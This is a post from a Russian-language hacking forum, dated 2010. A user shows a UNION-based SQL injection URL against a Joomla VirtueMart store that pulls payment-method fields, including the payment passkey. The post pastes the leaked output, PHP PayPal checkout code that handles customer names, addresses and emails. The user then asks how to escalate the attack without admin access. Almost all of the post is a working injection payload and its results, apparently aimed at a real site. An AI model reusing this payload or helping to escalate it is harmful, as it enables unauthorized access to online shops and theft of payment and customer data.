Тема: Ваши вопросы по уязвимостям.
Показать сообщение отдельно

  #9  
Старый 02.05.2010, 13:48
FlaktW
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
С нами: 8803961

Репутация: 8
По умолчанию
Делаю запрос к БД:

index.php?id=-157+union+select+concat_ws(0x3a,payment_method_id,
vendor_id,
payment_method_name,
payment_class,
shopper_group_id,
payment_method_discount,
payment_method_discount_is_percent,
payment_method_discount_max_amount,
payment_method_discount_min_amount,
list_order,
payment_method_code,
enable_processor,
is_creditcard,
payment_enabled,
accepted_creditcards,
payment_extrainfo,
payment_passkey),2,3,4+from+jos_vm_payment_method

Выводится следующая ошибка:

4:1:PayPals_paypal:5:0.00:0:0.00:0.00:0:PP:P:0:Y ::country."' ORDER BY country_2_code ASC"; $db1->query($q); $url = "https://www.paypal.com/cgi-bin/webscr"; $tax_total = $db->f("order_tax") + $db->f("order_shipping_tax"); $discount_total = $db->f("coupon_discount") + $db->f("order_discount"); $post_variables = Array( "cmd" => "_ext-enter", "redirect_cmd" => "_xclick", "upload" => "1", "business" => PAYPAL_EMAIL, "receiver_email" => PAYPAL_EMAIL, "item_name" => $VM_LANG->_('PHPSHOP_ORDER_PRINT_PO_NUMBER').": ". $db->f("order_id"), "order_id" => $db->f("order_id"), "invoice" => $db->f("order_number"), "amount" => round( $db->f("order_subtotal")+$tax_total-$discount_total, 2), "shipping" => sprintf("%.2f", $db->f("order_shipping")), "currency_code" => $_SESSION['vendor_currency'], "address_override" => "1", "first_name" => $dbbt->f('first_name'), "last_name" => $dbbt->f('last_name'), "address1" => $dbbt->f('address_1'), "address2" => $dbbt->f('address_2'), "zip" => $dbbt->f('zip'), "city" => $dbbt->f('city'), "state" => $dbbt->f('state'), "country" => $db1->f('country_2_code'), "email" => $dbbt->f('user_email'), "night_phone_b" => $dbbt->f('phone_1'), "cpp_header_image" => $vendor_image_url, "return" => SECUREURL ."index.php?option=com_virtuemart&page=checkout.re sult&order_id=".$db->f("order_id"), "notify_url" => SECUREURL ."administrator/components/com_virtuemart/notify.php", "cancel_return" => SECUREURL ."index.php", "undefined_quantity" => "0", "test_ipn" => PAYPAL_DEBUG, "pal" => "NRUBJXESJTY24", "no_shipping" => "1", "no_note" => "1" ); if( $page == "checkout.thankyou" ) { $query_string = "?"; foreach( $post_variables as $name => $value ) { $query_string .= $name. "=" . urlencode($value) ."&"; } vmRedirect( $url . $query_string ); } else { echo '
'; echo ''; foreach( $post_variables as $name => $value ) { echo ''; } echo '
'; } ?>:

Доступа к админке нет.

Это можно как-то раскрутить?
 
Ответить с цитированием